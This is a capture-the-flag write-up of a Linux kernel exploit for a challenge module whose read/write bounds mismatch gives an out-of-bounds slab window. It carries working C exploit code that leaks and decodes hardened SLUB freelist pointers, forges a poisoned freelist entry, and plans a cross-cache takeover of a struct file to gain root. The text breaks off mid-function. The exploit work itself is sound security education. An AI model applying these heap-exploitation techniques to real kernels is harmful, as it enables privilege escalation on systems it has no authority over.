b01lers ctf 2026: kernel pwn (part 2)

18 May, 2026

Intro

Previously I wrote a writeup on the first kernel challenge from this CTF — if you haven’t read it yet, I recommend starting with Part 1.

This post covers multifiles, the second kernel pwn challenge.

This post is coming out a bit late, so unlike Part 1, where I reimplemented the exploit from scratch in Rust to cover every step, this time you get a refactored version of the original C exploit.

multifiles

download

Recon

.
├── build_out
│   ├── bzImage
│   ├── initrd.cpio.gz
│   ├── kernel.config
│   ├── multifiles.ko
│   └── System.map
├── deploy
│   ├── docker-compose.prod.yml
│   ├── docker-compose.yml
│   ├── Dockerfile
│   ├── Dockerfile_build
│   └── wrapper.sh
├── dev.sh
├── pwn_build.sh
├── README.md
└── src
    ├── drop_priv.c
    ├── initrd_init
    ├── kernel-cache-usercopy.diff
    ├── kernel.config.fragment
    ├── Makefile
    └── multifiles.c

4 directories, 19 files

Based on deploy/wrapper.sh, I assembled a local run script:

#!/bin/sh
qemu-system-x86_64 \
    -nodefaults -m 256M -nographic \
    -kernel ~/multifiles/build_out/bzImage \
    -initrd ~/multifiles/build_out/initrd.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
    -cpu qemu64,+smep,+smap \
    -smp 1 -no-reboot -serial stdio -monitor none

The VM boots successfully.

[multifiles] booting challenge initrd
==============================
 multifiles kernel challenge
==============================
Device: /dev/multifiles
Flag:   /root/flag.txt (root only)
User:   ctf (uid=1000)
==============================


BusyBox v1.35.0 (Debian 1:1.35.0-4+b7) built-in shell (ash)
Enter 'help' for a list of built-in commands.

sh: can't access tty; job control turned off
~ $

Read sources

drop_priv and initrd_init follow the same pattern as Part 1. Here we have a target kernel module and a small patch to the kernel itself.

Let’s go through the interesting source files.

kernel-cache-usercopy.diff adds kmem_cache_copy_from_user / kmem_cache_copy_to_user — wrappers around copy_from/to_user that first verify the destination/source object belongs to a specific slab cache before performing the copy:

+/**
+ * kmem_cache_copy_from_user - Copy from userspace into an object from a cache
+ * @cachep: The cache the destination object must belong to.
+ * @to: Destination address in kernel memory.
+ * @from: Source address in userspace.
+ * @n: Number of bytes to copy.
+ *
+ * This wraps copy_from_user(), but first verifies that @to lives in a slab
+ * belonging to @cachep. The subsequent copy_from_user() call performs the
+ * normal hardened usercopy heap validation for the destination range.
+ *
+ * Return: number of bytes not copied, like copy_from_user().
+ */

From kernel.config.fragment, note the slab configuration:

CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SLAB_FREELIST_RANDOM=n

FREELIST_HARDENED encodes freelist pointers (next ^ secret ^ bswap64(slot_addr)), making them not trivially readable. FREELIST_RANDOM=n means the freelist order within a slab page is deterministic — useful for reliable object placement. If this is unfamiliar, this article is a good reference.

multifiles.c: the init and exit functions are standard boilerplate. The interesting part is the file_operations table:

static const struct file_operations multifiles_fops = {
    .owner = THIS_MODULE,
    .open = multifiles_open,
    .release = multifiles_release,
    .read = multifiles_read,
    .write = multifiles_write,
    .llseek = multifiles_llseek,
    .unlocked_ioctl = multifiles_ioctl,
    #ifdef CONFIG_COMPAT
    .compat_ioctl = multifiles_ioctl,
    #endif
};

Now the data structures the module operates on:

#define TYPE_FILE 1

// this should be the only flags needed. should not be leaked to userspace
#define DEFAULT_FLAGS 0x7d333a7b66746362

#define NAME_SIZE 16
#define DATA_COUNT 16
#define MAX_RW_SIZE 64

typedef struct {
    u64 type;
    u64 flags;
    char name[NAME_SIZE];
    u64 data[DATA_COUNT];
} MultiFile;

#define NUM_SLOTS 67

typedef struct {
    struct mutex lock;
    MultiFile *files[NUM_SLOTS];
    u32 active_idx;
} MultiFileList;

typedef struct {
    char name[16];
} MultiFileCreateReq;

A few things to note from this:

MultiFile is 0xa0 bytes (0x10 header of type+flags + 0x10 name + 0x80 data). These are the objects allocated from multifiles_cache, one per ioctl(CREATE).
Each open() allocates one MultiFileList (stored in file->private_data), which holds up to NUM_SLOTS = 67 MultiFile pointers in files[]. So a single fd can keep up to 67 live objects, and the index returned by CREATE is just the slot in this per-fd array. active_idx selects which slot read/write operate on.
DEFAULT_FLAGS = 0x7d333a7b66746362 is set on every freshly created MultiFile, and the source explicitly comments it should not be leaked to userspace. In ASCII that’s bctf{:3} — a deliberate canary. Note where it lives: offset 0x08, inside the type+flags header. As we’ll see, the cache’s usercopy region starts at name (0x10), so this header sits outside what copy_to/from_user is allowed to touch — which is exactly what stops us from leaking it directly.
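
The offsets above are easy to double-check from userspace. Here is a minimal sketch, assuming a mirror of the struct with uint64_t standing in for the kernel’s u64; the names MultiFileMirror and flags_to_ascii are mine, not the module’s.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NAME_SIZE  16
#define DATA_COUNT 16

/* Userspace mirror of the module's MultiFile; the name is hypothetical. */
typedef struct {
    uint64_t type;
    uint64_t flags;
    char     name[NAME_SIZE];
    uint64_t data[DATA_COUNT];
} MultiFileMirror;

/* Compile-time checks of the offsets quoted in the text. */
_Static_assert(sizeof(MultiFileMirror) == 0xa0, "object size is 0xa0");
_Static_assert(offsetof(MultiFileMirror, flags) == 0x08, "flags at 0x08");
_Static_assert(offsetof(MultiFileMirror, name) == 0x10, "name at 0x10");
_Static_assert(offsetof(MultiFileMirror, data) == 0x20, "data at 0x20");

/* Spell out the 8 bytes of a flags value in little-endian memory order. */
static void flags_to_ascii(uint64_t flags, char out[9]) {
    assert(out != NULL);
    for (int i = 0; i < 8; i++)
        out[i] = (char)((flags >> (8 * i)) & 0xff);
    out[8] = '\0';
}
```

Calling flags_to_ascii(0x7d333a7b66746362ULL, s) fills s with the canary string, lowest byte first, which is the order the bytes sit in memory on x86-64.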

Vulnerabilities

Looking at multifiles_read:

static ssize_t multifiles_read(struct file *self, char __user *buf, size_t count, loff_t *offset) {
    MultiFileList *list = self->private_data;
    ssize_t ret = 0;
    if (list == NULL) {
        return -EINVAL;
    }

    mutex_lock(&list->lock);

    // check index is selected
    MultiFile *multi_file = get_active_file(list);
    if (multi_file == NULL) {
        ret = -ENOENT;
        goto out_unlock;
    }

    // check read bounds
    if (
        count > MAX_RW_SIZE
        || (count % sizeof(u64)) != 0
        || *offset >= sizeof(MultiFile)
        || *offset < 0
    ) {
        ret = -EINVAL;
        goto out_unlock;
    }

    loff_t old_offset = *offset;
    *offset += count;

    if (kmem_cache_copy_to_user(
        multifiles_cache,
        buf,
        ((u8 *) &multi_file->data[0]) + old_offset,
        count
    ) != 0) {
        ret = -EFAULT;
        goto out_unlock;
    }

    ret = count;

out_unlock:
    mutex_unlock(&list->lock);
    return ret;
}

multifiles_write is similar.

The bounds check validates offset against sizeof(MultiFile) = 0xa0, but the actual copy base is &multi_file->data[0] + offset = obj+0x20+offset. So at offset=0x80 the copy starts at obj+0xa0 — exactly the first byte of the next adjacent slab object.
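
To make the mismatch concrete, here is a small sketch that mirrors the driver’s bounds check and then computes where the copy really starts. The helper names (driver_accepts, copy_start, bytes_past_end) are hypothetical; only the constants come from the module source.

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE    0xa0  /* sizeof(MultiFile) */
#define DATA_OFFSET 0x20  /* offsetof(MultiFile, data) */
#define MAX_RW_SIZE 64

/* Mirrors the driver's bounds check: 1 if (f_pos, count) is accepted. */
static int driver_accepts(long f_pos, size_t count) {
    return count <= MAX_RW_SIZE && count % 8 == 0 &&
           f_pos >= 0 && f_pos < OBJ_SIZE;
}

/* Object-relative offset where the copy actually starts. */
static size_t copy_start(long f_pos) {
    assert(f_pos >= 0 && f_pos < OBJ_SIZE);
    return DATA_OFFSET + (size_t)f_pos;
}

/* Number of copied bytes that fall past the end of the object. */
static size_t bytes_past_end(long f_pos, size_t count) {
    size_t end = copy_start(f_pos) + count;
    if (end <= OBJ_SIZE)
        return 0;
    size_t over = end - OBJ_SIZE;
    return over < count ? over : count;
}
```

For f_pos = 0x80 and count = 64 the check passes, copy_start() returns 0xa0 and all 64 bytes are past the end of the object: the check is done against the object, but the copy is relative to data.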

Now multifiles_llseek:

loff_t multifiles_llseek(struct file *self, loff_t offset, int whence) {
    MultiFileList *list = self->private_data;
    if (
        list == NULL
        // too lazy to support other types
        || whence != SEEK_SET
        || offset >= sizeof(MultiFile)
        || offset < 0
    ) {
        return -EINVAL;
    }

    mutex_lock(&list->lock);
    self->f_pos = offset;
    mutex_unlock(&list->lock);

    return offset;
}

llseek lets us set f_pos (the file position) to any value in [0, 0xa0). Combined with the mismatched copy base, this gives a controlled OOB window into the next adjacent slab object.

It’s worth being precise about why f_pos is the same thing as the loff_t *offset that multifiles_read/multifiles_write receive. When userspace calls read(fd, buf, n), the VFS path ksys_read() (in fs/read_write.c) does roughly:

loff_t pos = file_pos_read(file);     // copy of file->f_pos
vfs_read(file, buf, n, &pos);         // -> file->f_op->read(file, buf, n, &pos)
file_pos_write(file, pos);            // write the (advanced) position back

So the loff_t *offset argument handed to the driver is a pointer to a copy of file->f_pos, and after the op the kernel writes it back (which is why a normal read advances the position). multifiles_llseek sets file->f_pos directly. Net effect: lseek() followed by read()/write() lets us pick exactly where the driver’s copy starts — including the OOB window [0x80, 0x9f].

Primitives

Controlled OOB read/write: By setting f_pos via llseek to a value in [0x80, 0x9f], read()/write() will copy from/to obj+0x20+offset, which lands in the next adjacent slab object. Up to 64 bytes (MAX_RW_SIZE) per operation, 8-byte aligned (count % sizeof(u64) == 0).

Arbitrary position within object: llseek allows resetting f_pos to any value in [0, 0x9f], giving full control over where within the object (or OOB window) the next read/write lands.

Multiple independent file descriptors: Each open() on /dev/multifiles gets its own MultiFileList with its own 67 slots and its own f_pos. Objects in one fd’s list can be adjacent in the slab to objects from another fd’s list, enabling cross-fd OOB access.

Exploitation

Before diving in, here’s the whole plan:

1. Validate the OOB. Confirm a slot can read its neighbor through the base-vs-bounds mismatch.
2. Leak the heap. Decode page_base and cache_random from encoded freelist words on a full slab page.
3. Forge a freelist pointer. With the secret known, poison a freed object’s next to a chosen address.
4. Find contiguous pages. Locate two physically adjacent slab pages A, B == A+0x1000.
5. Build a page-end fake object. Poison A’s tail so a fresh object lands at A+0xfc0 and straddles into B.
6. Cross-cache reclaim. Drain B back to the buddy allocator and let a struct file for /bin/drop_priv take its place.
7. Patch and respawn. Flip the file’s f_mode write bits through the straddle, pwrite the binary, and let init rerun it as root.

Primitive validation

The exploit is built on a thin layer of wrappers over the driver ABI:

int  mf_open(void);                          // open("/dev/multifiles", O_RDWR)
int  mf_create(int fd, const char *name);    // ioctl(CREATE) -> slot index
void mf_set_active(int fd, uint32_t idx);    // ioctl(SET_ACTIVE)
void mf_delete(int fd, uint32_t idx);        // ioctl(DELETE)
// select idx, lseek(fpos, SEEK_SET), then read len bytes (len % 8 == 0, <= 64)
void mf_read(int fd, uint32_t idx, off_t fpos, void *buf, size_t len);
// same sequence, but write() instead of read(); used by the later stages
void mf_write(int fd, uint32_t idx, off_t fpos, const void *buf, size_t len);

Note mf_read folds set_active + lseek + read into one call, so fpos is exactly the f_pos the driver will use as its copy offset.

For now let’s work within a single file descriptor and validate the OOB primitive.

int main(void) {
    int fd = mf_open();
    int a0 = mf_create(fd, "a0");
    int a1 = mf_create(fd, "a1");
    int a2 = mf_create(fd, "a2");
    printf("[*] created slots: a0=%d a1=%d a2=%d\n", a0, a1, a2);

    printf("[*] press enter to set_active(%d)...\n", a0);
    getchar();

    mf_set_active(fd, a0);
    printf("[*] active = %d\n", a0);

    return 0;
}

multifiles_set_active is static and gets inlined into multifiles_ioctl, so there is no standalone symbol to break on. Set a breakpoint at multifiles_ioctl (.text+0x2f0) and step into the SET_ACTIVE branch from the switch.

gef> x/4gx $r12+0x20      # MultiFileList->files[]: three objects, 0xa0 apart
0xffff8880038d7020:     0xffff888003989000      0xffff8880039890a0
0xffff8880038d7030:     0xffff888003989140      0x0000000000000000
gef> telescope *(void**)($r12+0x20) -n
      0xffff888003989000|+0x0000|+000: 0x0000000000000001
      0xffff888003989008|+0x0008|+001: 0x7d333a7b66746362 'bctf{:3}a0'
      0xffff888003989010|+0x0010|+002: 0x0000000000003061 ('a0'?)
      ...
      0xffff8880039890a0|+0x00a0|+020: 0x0000000000000001
      0xffff8880039890a8|+0x00a8|+021: 0x7d333a7b66746362 'bctf{:3}a1'
      0xffff8880039890b0|+0x00b0|+022: 0x0000000000003161 ('a1'?)
      ...
      0xffff888003989140|+0x0140|+040: 0x0000000000000001
      0xffff888003989148|+0x0148|+041: 0x7d333a7b66746362 'bctf{:3}a2'
      0xffff888003989150|+0x0150|+042: 0x0000000000003261 ('a2'?)
      ...

Leaking the flag — and the hardened usercopy wall

The obvious first target is that bctf{:3} canary in flags. A freshly created neighbor has flags at offset 0x08, so let’s point the OOB read at the neighbor’s header: f_pos=0x80 makes the copy start at obj+0xa0, the neighbor’s offset 0, which would put its flags at leak+0x08.

uint8_t leak[0x40];
mf_read(fd, a0, 0x80, leak, sizeof(leak)); // copy base obj+0xa0 = neighbor+0x00
// neighbor flags would land at leak+0x08
printf("[*] neighbor flags = 0x%llx\n", *(unsigned long long *)(leak + 8));

Running it instantly panics:

[   12.567074] usercopy: Kernel memory exposure attempt detected from SLUB object 'multifiles_cache' (offset 0, size 64)!
[   12.568300] kernel BUG at mm/usercopy.c:102!
[   12.571507] RIP: 0010:usercopy_abort+0x68/0x80
[   12.574242] Call Trace:
[   12.575606]  __check_heap_object+0x7d/0xa0
[   12.575858]  __check_object_size+0x166/0x2b0
[   12.575983]  kmem_cache_copy_to_user+0x85/0xe0
[   12.576196]  multifiles_read+0xa6/0xc0 [multifiles]
[   12.576675]  vfs_read+0xda/0x350
[   12.576868]  do_syscall_64+0x9e/0x1a0
[   12.581620] Kernel panic - not syncing: Fatal exception

This is hardened usercopy. The module creates its cache with kmem_cache_create_usercopy(..., offsetof(MultiFile, name), USERCOPY_SIZE, ...), i.e. useroffset 0x10 and usersize 0x90. Only [obj+0x10, obj+0xa0) (name + data) is allowed to cross the user boundary. __check_object_size figures out which slab object our source pointer lands in (the neighbor) and checks the range against that object’s usercopy region. Our copy started at neighbor+0x00, below 0x10, so it aborts with “offset 0, size 64”.

The takeaway is a hard constraint on the primitive: the OOB copy must start at neighbor+0x10 or later, i.e. f_pos >= 0x90. The header (type and flags, plus anything else that lives below offset 0x10) is unreachable this way. So the bctf{:3} canary cannot be leaked directly; it lives in the header precisely so that hardened usercopy guards it.

Pointing the read at the neighbor’s name instead works cleanly (f_pos=0x90 → start obj+0xb0 = neighbor+0x10):

// usercopy region is [name(0x10), 0xa0); copy must start at >= neighbor+0x10
uint8_t leak[0x40];
mf_read(fd, a0, 0x90, leak, sizeof(leak)); // copy base obj+0xb0 = neighbor->name
printf("[*] neighbor name = 0x%llx ('%.16s')\n",
       *(unsigned long long *)leak, (char *)leak);

[*] neighbor name = 0x3161 ('a1')

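0x3161 is "a1", the name we gave the second object, confirming that slot 0 and slot 1 are adjacent and the OOB read works. The primitive is validated, with the constraint baked in: the neighbor’s usercopy region is [neighbor+0x10, neighbor+0xa0) (name + data), and because f_pos tops out at 0x9f and a single copy at 64 bytes, the part we can actually reach is [neighbor+0x10, neighbor+0x5f).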
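
The constraint can be written down as a tiny model. This is a simplified sketch of the whitelist logic, not the kernel’s code: it assumes objects are packed back to back every 0xa0 bytes, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE    0xa0  /* sizeof(MultiFile) */
#define DATA_OFFSET 0x20  /* offsetof(MultiFile, data) */
#define USEROFFSET  0x10  /* offsetof(MultiFile, name) */
#define USERSIZE    0x90  /* name + data */

/* Offset of the copy's first byte inside whichever slab object it lands in,
 * assuming objects sit every OBJ_SIZE bytes. */
static size_t landing_offset(long f_pos) {
    assert(f_pos >= 0 && f_pos < OBJ_SIZE);
    return (DATA_OFFSET + (size_t)f_pos) % OBJ_SIZE;
}

/* Simplified whitelist check: the whole window must sit inside
 * [USEROFFSET, USEROFFSET + USERSIZE) of a single object. */
static int usercopy_window_ok(long f_pos, size_t count) {
    size_t off = landing_offset(f_pos);
    return off >= USEROFFSET && off + count <= USEROFFSET + USERSIZE;
}
```

Under this model usercopy_window_ok(0x80, 64) is 0 (the panic above) and usercopy_window_ok(0x90, 64) is 1 (the name read). It also shows that a copy straddling the boundary between two objects, such as f_pos = 0x48 with 64 bytes, is rejected, so a usable OOB copy has to start inside the neighbor.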

Free the chunk

Let’s free the neighbor (mf_delete) and look at what SLUB leaves behind.

Dumping the freed object (shown here in gdb at its real address; the part in [0x10, 0x5f) is also reachable through our OOB read):

0xffff8880039980a0 +0x00: 0x0000000000000001           type   (NOT cleared on free)
0xffff8880039980a8 +0x08: 0x7d333a7b66746362  bctf{:3}  flags  (NOT cleared)
0xffff8880039980b0 +0x10: 0x0000000000003161  "a1"      name   (NOT cleared)
0xffff8880039980b8 +0x18: 0x0000000000000000
0xffff8880039980c0 +0x20: 0x0000000000000000           data[0]
   ...
0xffff8880039980f0 +0x50: 0x76bb00d4c7d73040  <-- freelist pointer
0xffff8880039980f8 +0x58: 0x0000000000000000
   ...
0xffff888003998140 +0xa0: 0x0000000000000001           (next object's type)

Two things stand out.

First, SLUB does not zero an object on free — it only writes the freelist pointer. That’s why type, flags (bctf{:3}) and name (“a1”) survive untouched in the freed chunk.

Second, the freelist pointer sits at offset 0x50, not 0. That’s sizeof(MultiFile) / 2, the result of the “relocate freelist pointer to the middle of the object” hardening. Crucially 0x50 falls inside [0x10, 0xa0) — the usercopy region — so unlike the 0x00 header, we can both read and write the freelist pointer through the OOB primitive.

Why does the value (0x76bb00d4c7d73040) look like garbage? CONFIG_SLAB_FREELIST_HARDENED mangles it:

fp = next ^ s->random ^ bswap64(&slot)

where &slot is the address of the pointer itself (obj+0x50), next is the next free object in the list, and s->random is a per-cache secret. A single read is one equation with three unknowns — we can’t naively decode it, nor forge an arbitrary pointer to write back.

Reading it through the OOB primitive

The dump above is gdb at the object’s real address; in the exploit we only have read(). To pull neighbor+0x50 into a 64-byte copy window the copy has to start at or before it: f_pos=0x98 sets the base to obj+0xb8 = neighbor+0x18, and a 0x40-byte read spans neighbor[0x18, 0x58), so the encoded word at neighbor+0x50 lands at leak+0x38.

We also need the neighbor to actually be free — otherwise +0x50 is just zeroed data — and we want its next to be a value we can reason about. So allocate three adjacent objects and free the last two. SLUB’s per-cpu freelist is LIFO, so freeing b2 then b1 leaves b1->next == b2:

int b0 = mf_create(fd, "b0");
int b1 = mf_create(fd, "b1");
int b2 = mf_create(fd, "b2");

mf_delete(fd, b2);   // free b2 first
mf_delete(fd, b1);   // then b1  ->  b1->next == b2, freeptr written at b1+0x50

uint8_t leak[0x40];
mf_read(fd, b0, 0x98, leak, sizeof(leak));   // window b1[0x18, 0x58)

uint64_t enc;
memcpy(&enc, leak + 0x38, sizeof(enc));      // b1+0x50
printf("[+] encoded freelist ptr @ b1+0x50 = 0x%016llx\n",
       (unsigned long long)enc);

[+] encoded freelist ptr @ b1+0x50 = 0x4b89a339485018db

That 0x4b89a339485018db is b2 ^ s->random ^ bswap64(b1+0x50) — kernel-controlled metadata, not the name bytes we picked. Reading (and writing) +0x50 is now a real code primitive, not just a gdb observation.

What the membership check rules out

Before building on the freelist pointer, look at the custom gate every copy goes through (kernel-cache-usercopy.diff):

static bool kmem_cache_has_object(struct kmem_cache *cachep, const void *ptr) {
	struct slab *slab = virt_to_slab(ptr);
	return slab && slab->slab_cache == cachep;
}

This is a per-slab-folio check: it resolves the page ptr lives in and requires slab->slab_cache == multifiles_cache. The consequence for a cross-cache plan: if we drain a multifiles slab page back to the buddy allocator and let another cache (say filp_cachep) reclaim it, that page’s slab_cache is no longer multifiles_cache, so any OOB read/write through multifiles_read/write fails the check. We cannot OOB-read a reclaimed struct file directly — the naive “cross-cache then read the foreign object” approach is dead on arrival.

So the workable primitive is the freelist pointer we can read and write at +0x50. The remaining problem is weaponizing it under the hardening: either leak s->random + a heap address, or use a poisoning trick that cancels both (page-relative deltas XOR out the page base and the secret). That’s the next step.

Decoding the freelist pointer

Primary source

The encoding lives in freelist_ptr_encode() in mm/slub.c (v6.12):

static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
                    void *ptr, unsigned long ptr_addr)
{
    unsigned long encoded;
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
#else
    encoded = (unsigned long)ptr;
#endif
    return (freeptr_t){.v = encoded};
}

and set_freepointer() fixes ptr_addr to the storage slot itself:

unsigned long freeptr_addr = (unsigned long)object + s->offset;
*(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);

s->offset is 0x50 for our cache, swab on a 64-bit value is bswap64, so for an object at base O:

E(O) = next(O) ^ s->random ^ bswap64(O + 0x50)

One word is one equation in three unknowns — next, s->random, and O (which hides the unknown page base). We kill two of them with two XOR cancellations.

Two cancellations

XOR two words to cancel random. It’s one per-cache constant, so E(A) ^ E(B) drops it.
Same-page bswap cancels the page base. bswap64(a) ^ bswap64(b) = bswap64(a ^ b), and for two freeptr slots on the same 4K page a ^ b is just the low-bits delta — the page base is identical in both and cancels. We don’t know the address, but we know the distance.
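
Both cancellations can be checked offline. The sketch below is a userspace model of the encoding with made-up inputs; freeptr_encode and same_page_residue are hypothetical helper names, and 0x50 is the s->offset observed for this cache.

```c
#include <assert.h>
#include <stdint.h>

#define FREEPTR_OFFSET 0x50  /* s->offset for this cache */

/* Portable 64-bit byte swap. */
static uint64_t bswap64(uint64_t x) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (x & 0xff);
        x >>= 8;
    }
    return r;
}

/* E(O) = next ^ random ^ bswap64(O + 0x50) */
static uint64_t freeptr_encode(uint64_t next, uint64_t random, uint64_t obj) {
    return next ^ random ^ bswap64(obj + FREEPTR_OFFSET);
}

/* What is left of E(A) ^ E(B) besides next(A) ^ next(B), for two objects at
 * page-relative offsets off_a and off_b on the same 4K page. */
static uint64_t same_page_residue(uint64_t off_a, uint64_t off_b) {
    assert(off_a + FREEPTR_OFFSET < 0x1000 && off_b + FREEPTR_OFFSET < 0x1000);
    return bswap64((off_a + FREEPTR_OFFSET) ^ (off_b + FREEPTR_OFFSET));
}
```

For any page-aligned base and any random, E(A) ^ E(B) equals next(A) ^ next(B) ^ same_page_residue(off_a, off_b): neither the secret nor the page base survives the XOR.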

Layout

0x1000 / 0xa0 = 25 objects per page (0x60 tail padding). On a pristine page allocations climb by address, so O_i = page + i*0xa0. We use three of them:

O_20 = page+0xc80   slot page+0xcd0
O_22 = page+0xdc0   slot page+0xe10
O_24 = page+0xf00   slot page+0xf50   (last object on the page)

To read E(O_i) we OOB-read from its live left neighbor O_{i-1} (f_pos=0x98, word at leak+0x38), so we keep odd indices alive and free even ones. Fill the page completely, then free 24, 22, 20 in that order — the per-cpu freelist is LIFO and a full page starts with an empty freelist, so:

free 24:  next(O_24) = NULL
free 22:  next(O_22) = O_24
free 20:  next(O_20) = O_22
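
The free order matters because of the LIFO behaviour. A toy model, using indices instead of pointers and ignoring everything else SLUB does (the struct and function names are hypothetical), reproduces the chain above:

```c
#include <assert.h>

#define OBJS_PER_PAGE 25
#define NIL (-1)

/* Toy freelist: head index plus a next[] array, indices instead of pointers. */
struct toy_freelist {
    int head;
    int next[OBJS_PER_PAGE];
};

static void fl_init(struct toy_freelist *fl) {
    fl->head = NIL;
    for (int i = 0; i < OBJS_PER_PAGE; i++)
        fl->next[i] = NIL;
}

/* Free pushes onto the head: the freed object's next is the old head. */
static void fl_free(struct toy_freelist *fl, int idx) {
    assert(idx >= 0 && idx < OBJS_PER_PAGE);
    fl->next[idx] = fl->head;
    fl->head = idx;
}

/* Alloc pops the head, or returns NIL when the list is empty. */
static int fl_alloc(struct toy_freelist *fl) {
    int idx = fl->head;
    if (idx != NIL)
        fl->head = fl->next[idx];
    return idx;
}
```

After fl_free() on 24, 22, 20 in that order, next[24] is NIL, next[22] is 24 and next[20] is 22, and three fl_alloc() calls hand the objects back as 20, 22, 24.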

Recovering page base and random

slot24 ^ slot22 = 0xf50 ^ 0xe10 = 0x140, and bswap64(0x140) = 0x4001000000000000. With e24/e22/e20 read from O_23/O_21/O_19:

// e24 = NULL ^ R ^ bsw(page+0xf50)
// e22 = O_24 ^ R ^ bsw(page+0xe10)   (O_24 = page+0xf00)
uint64_t O24    = e22 ^ e24 ^ 0x4001000000000000ULL; // R and page base both cancel
uint64_t page   = O24 - 0xf00;
uint64_t random = e24 ^ bsw(page + 0xf50);           // e24 = R ^ bsw(slot24)

// cross-check: decode O_20 -> next must be O_22
if ((e20 ^ random ^ bsw(page + 0xcd0)) != page + 0xdc0)
    die("decode cross-check failed");

Running it:

[~] decode
[+] page_base    = 0xffffa30441994000
[+] cache_random = 0x0f2dff77be715bcc

page_base is 0x1000-aligned and lands in the direct map — but note it is not the textbook 0xffff8880...; this kernel has direct-map KASLR, which is exactly why we never hardcode a base and validate with the cross-check (next(O_20) == O_22) instead. With s->random in hand the encoding is fully invertible: we can decode any freelist word, and — more usefully — forge one as target ^ random ^ bswap64(&slot).
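
The recovery can be rehearsed without a kernel by encoding three words for a known page and secret and checking that they come back out. This is a sketch with hypothetical names (sim_encode, recover_leak, struct heap_leak); the inputs in the usage note are just the values from the log above, fed in as test data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OBJ_SIZE 0xa0
#define FP_OFF   0x50

static uint64_t bswap64(uint64_t x) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (x & 0xff);
        x >>= 8;
    }
    return r;
}

/* Simulated kernel side: encode next for an object at address obj. */
static uint64_t sim_encode(uint64_t next, uint64_t random, uint64_t obj) {
    return next ^ random ^ bswap64(obj + FP_OFF);
}

struct heap_leak {
    uint64_t page;
    uint64_t random;
};

/* Recover page base and random from the encoded words of O_24, O_22, O_20.
 * Returns 0 on success, -1 if the result is not plausible. */
static int recover_leak(uint64_t e24, uint64_t e22, uint64_t e20,
                        struct heap_leak *out) {
    assert(out != NULL);
    uint64_t o24 = e22 ^ e24 ^ bswap64(0xf50 ^ 0xe10); /* random, base cancel */
    uint64_t page = o24 - 24 * OBJ_SIZE;
    if (page & 0xfff)
        return -1;                                     /* not page aligned */
    uint64_t random = e24 ^ bswap64(page + 0xf50);     /* next(O_24) == NULL */
    if ((e20 ^ random ^ bswap64(page + 0xcd0)) != page + 22 * OBJ_SIZE)
        return -1;                                     /* next(O_20) != O_22 */
    out->page = page;
    out->random = random;
    return 0;
}
```

Encoding e24, e22 and e20 with sim_encode() for page 0xffffa30441994000 and random 0x0f2dff77be715bcc and passing them to recover_leak() returns exactly those two values; flipping a bit in e20 makes the cross-check fail.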

Practical note. The 25-object fill must land on a pristine page for O_i = page + i*0xa0 to hold, so in the exploit decode runs first on a dedicated fd, before any other CREATE, and refills the three freed slots afterwards so the later stages start on a clean page.

Poisoning the freelist

With s->random and a heap base we can run the encoding backwards: to make slot S hold an encoded pointer to target, write target ^ random ^ bswap64(S). The plan is to overwrite a freed object’s +0x50 so the freelist leads to an address we picked — then two CREATEs hand it back as a fresh MultiFile.

Target. page + 0xfc0. A 0xa0 object placed there spans [page+0xfc0, page+0x1060) — the last 0x40 bytes of this page plus the first 0x60 of the next physical page. 0xfc0 sits in the page’s tail padding, and the object’s start is still on a multifiles page, so the membership check and hardened usercopy both stay happy. That straddle is what later becomes a cross-page primitive.

Where we poison. The freed object F has to be the current cpu-slab freelist head and at a known address. page0 from the leak fits both: right after decode it is full and still the cpu slab, and F = page + 12*0xa0 (slot 0x7d0) has a known address. Freeing it pushes it to the cpu freelist with F->next == NULL.

Writing +0x50. Same window as the read, other direction: from the live left neighbor F-1 at f_pos=0x98 the copy lands on F[0x18, 0x58), so we read it, splice the forged word in at leak+0x38, and write it back.

uint32_t F      = 12;                     // F = page + 12*0xa0
uint64_t F_slot = page + 12*0xa0 + 0x50;  // page+0x7d0
uint64_t target = page + 0xfc0;

mf_delete(fd, F);                         // F -> cpu freelist head, F->next == NULL

uint64_t enc = target ^ random ^ bsw(F_slot);   // forge
mf_read (fd, F - 1, 0x98, leak, sizeof(leak));
memcpy(leak + 0x38, &enc, 8);
mf_write(fd, F - 1, 0x98, leak, sizeof(leak));

// read it back and decode -> must equal target
mf_read(fd, F - 1, 0x98, leak, sizeof(leak));
memcpy(&enc, leak + 0x38, 8);
uint64_t decoded = enc ^ random ^ bsw(F_slot);

[~] poison
[+] F+0x50 decodes to 0xffff896f419bafc0 (target 0xffff896f419bafc0)

The freelist now reads F -> page+0xfc0: the next CREATE pops F, and the one after pops page+0xfc0. We stop one step short of actually allocating it — popping page+0xfc0 sets the cpu freelist head to whatever garbage sits at *(page+0x1010), so doing it is a one-way door. Instead we re-encode NULL back into F+0x50 and consume F, leaving page0 full and the cache clean. The next step is to make sure that straddle reaches a page we actually own.
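
The read, splice, write-back pattern and the later restore to NULL can be wrapped in two small helpers that operate on the 0x40-byte window. This is a sketch: the names are hypothetical, and the alignment assert is a sanity check of my own rather than something the allocator is known to enforce.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define WINDOW_LEN  0x40  /* one read()/write() at f_pos = 0x98 */
#define FREEPTR_IDX 0x38  /* neighbor+0x50 minus window start neighbor+0x18 */

static uint64_t bswap64(uint64_t x) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (x & 0xff);
        x >>= 8;
    }
    return r;
}

/* Decode the freelist word held in a window, given the slot's address. */
static uint64_t window_get_next(const uint8_t win[WINDOW_LEN],
                                uint64_t random, uint64_t slot) {
    uint64_t enc;
    memcpy(&enc, win + FREEPTR_IDX, sizeof(enc));
    return enc ^ random ^ bswap64(slot);
}

/* Overwrite only the freelist word; the other 0x38 bytes stay untouched. */
static void window_set_next(uint8_t win[WINDOW_LEN], uint64_t random,
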